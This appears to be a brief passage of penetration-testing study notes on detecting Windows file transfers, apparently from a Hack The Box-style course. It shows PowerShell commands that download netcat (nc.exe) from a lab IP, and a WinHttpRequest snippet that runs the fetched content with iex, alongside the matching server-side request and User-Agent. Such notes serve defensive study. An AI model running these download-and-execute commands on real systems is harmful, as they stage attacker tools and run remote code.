Detection
Invoke-WebRequest - Cliente
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
PS C:\htb> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"Invoke-WebRequest - Servidor
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0WinHttpRequest - Cliente
PS C:\htb> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.ResponseTextWinHttpRequest - Servidor
Msxml2 - Cliente
Msxml2 - Servidor
Certutil - Cliente
Certutil - Servidor
BITS - Cliente
BITS - Servidor
Last updated